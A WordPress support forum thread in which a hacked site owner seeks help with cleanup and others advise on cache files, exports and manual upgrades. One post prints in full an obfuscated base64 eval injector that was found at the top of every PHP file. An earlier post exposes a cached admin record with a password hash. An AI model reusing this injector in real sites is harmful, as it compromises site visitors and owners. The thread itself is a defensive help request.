How to identify malicious hack access

  • Ria

    (@ria)


    17 years, 6 months ago

    Hi,

    I’ve put off updating for too long and am now seeing the consequences. Although to be fair, the power outages here in Senegal are so frequent that I was reluctant to undertake an upgrade at this time.

    I noticed today that one of my sites, Ria Galleria, has been hacked.

    I’m now backing up all files before upgrading to the latest version of WP.

    However, I note that in the wp-content/cache folder, there are a number of suspicious files, named 68ab712425ad6ec9dbbc59ef2d2e10bb.php, for example.

    The code for the above example is as follows:

    <?php
//O:8:"stdClass":24:{s:2:"ID";s:1:"1";s:10:"user_login";s:3:"Ria";s:9:"user_pass";s:32:"1524198ac426cfdb7cb8ee5849ae0160";s:13:"user_nicename";s:3:"ria";s:10:"user_email";s:19:"[email protected]";s:8:"user_url";s:19:"http://riabacon.com";s:15:"user_registered";s:19:"2005-11-04 17:00:46";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:3:"Ria";s:8:"nickname";s:3:"Ria";s:13:"wp_user_level";s:2:"10";s:10:"user_level";s:2:"10";s:15:"wp_capabilities";a:1:{s:13:"administrator";b:1;}s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:11:"description";s:0:"";s:6:"jabber";s:0:"";s:3:"aim";s:0:"";s:3:"yim";s:0:"";s:12:"rich_editing";s:5:"false";s:14:"user_firstname";s:0:"";s:13:"user_lastname";s:0:"";s:16:"user_description";s:0:"";}
?>

    Questions:

    How can I be sure that all similar files are malicious? I don’t want to delete anything that should be there.

    Will the update simply delete all the malicious files?

    Thanks for your advice.

    Ria

Viewing 10 replies - 1 through 10 (of 10 total)
  • @mercime

    (@mercime)

    17 years, 6 months ago

    in addition to your SQL backup, go to Admin – Manage – Export – All authors to get XML file. Open up your XML and scan through the XML for text that look like hacks and clean them up. I’ve found and deleted hacks at the end of XML files, so delete those

    What’s your current version, 2.2, 2.3 …? Since you haven’t upgraded for a while, your plugins might be outdated as well. Recommend you import the cleaned up XML file to your 2.6.3 then find the upgraded plugins.

    whooami

    (@whooami)

    17 years, 6 months ago

    what you pasted is old, way old, and is the user files being cached. Its so old I cant remember a place to show you a reference to it.

    whooami

    (@whooami)

    17 years, 6 months ago

    this :

    http://osvdb.org/show/osvdb/25777

    talks about those files bing made.
    as does this:

    http://www.securityfocus.com/archive/1/435039/30/0/threaded

    New versions of all the caching plugins dont create those files. Neither does wordpress.

    Thread Starter Ria

    (@ria)

    17 years, 6 months ago

    The hacked site is using version 2.3.1.

    Where do I find the XML file exactly? I don’t see the thread you mention in PHPMyAdmin, for example.

    What about these files I mentioned previously. There appear to be hundreds of them. In the download window for the WP-content, there are 2938 files, most of which are similar to the example given previously.

    I’ve spotted the familiar code

    <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9yaWFiYWNvMS9wdWJsaWNfaHRtbC93cC1jb250ZW50L3BsdWdpbnMveWV0LWFub3RoZXItcGhvdG9ibG9nL2xpYi9sb2c0cGhwLTAuOS9zcmMvdGVzdHMvYXBwZW5kZXJzL2NvbmZpZ3MvY29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL3JpYWJhY28xL3B1YmxpY19odG1sL3dwLWNvbnRlbnQvcGx1Z2lucy95ZXQtYW5vdGhlci1waG90b2Jsb2cvbGliL2xvZzRwaHAtMC45L3NyYy90ZXN0cy9hcHBlbmRlcnMvY29uZmlncy9jb3BwZXIucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMDskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
<?php

    in many of the admin files.

    Where to start? As I asked before, will an upgrade simply write over these hacked files?

    Thread Starter Ria

    (@ria)

    17 years, 6 months ago

    Correction: the code in my previous post is in the first line of EVERY PHP file!

    UseShots

    (@useshots)

    17 years, 6 months ago

    @ria:
    1. As the name of the “cache” folder suggests, it is safe to delete all files in this folder. They will be recreated if needed.

    2. It was a bad idea to post the content of that cache file since it reveals some config details about your blog. Change the username and password asap.

    3. The XML export is not in PHPAdmin. It is in WordPress Admin.

    4. The “eval(base64_decode..” well may be something malicious. But when I (partially) decode it, it contain references to “yet-another-photoblog” plugin. Do you use this plugin? If it’s a legitimate plugin, why it encodea it’s code?

    Thread Starter Ria

    (@ria)

    17 years, 6 months ago

    Thanks for chipping in, UseShots.

    1. Done
    2. Oops. All changed.
    3. OK. Exported. It’s big (see below), probably because all the comments marked as spam are included in this XML file.
    4. I’m in contact with the plugin developer to see if this is the source of the weakness.

    Now I’ve upgraded the hacked site to latest WP. The SimpleScripts installation seems to have lost my posts and layout tweaks, however. I’m trying to import the XML file but it’s not uploading. It is 13MB and the uploader says max 2MB only.

    Ideas?

    I’m pretty nervous because I want to upgrade my main blog, but don’t want to risk losing four years of content. Is the WordPress 3-step install a better bet than the fully automatic SimpleScripts?

    @mercime

    (@mercime)

    17 years, 6 months ago

    How to batch delete spam from comments

    How to Import WXR or XML files when too large – WordPress Codex is your friend.

    whooami

    (@whooami)

    17 years, 6 months ago

    Is the WordPress 3-step install a better bet than the fully automatic SimpleScripts?

    in the case of a hacked blog, you do NOT want to use a script to upgrade.

    YOU, or someone else, needs to make sure that the files that WERE on the site are removed before putting new files in their place.

    Upgrade scripts can not take the place of a good set of eyes, and if your site was, in fact, exploited, youre doing yourself a huge disservice by not taking the time and effort to do a manual upgrade.

    There are countless threads on here that back up what I am saying. Here:

    http://ww.wp.xz.cn/support/topic/206175?replies=24

    … is just one.

    Dont say I didnt warn you.

    Thread Starter Ria

    (@ria)

    17 years, 6 months ago

    I deleted the 220,000 lines of spam comments, and got a file of 63kb (!).

    Import seemed smooth but lost links to photos and some tags are missing. I can work that out though. Ditto the minor layout tweaks. It’s a pretty small photoblog.

    As for the main blog mentioned previously, should I trust SimpleScripts not to overwrite content?

    Thanks for your continuing support.

    (It’s 1.20 a.m. in Dakar. Bonne nuit)

    Ria

Viewing 10 replies - 1 through 10 (of 10 total)

The topic ‘How to identify malicious hack access’ is closed to new replies.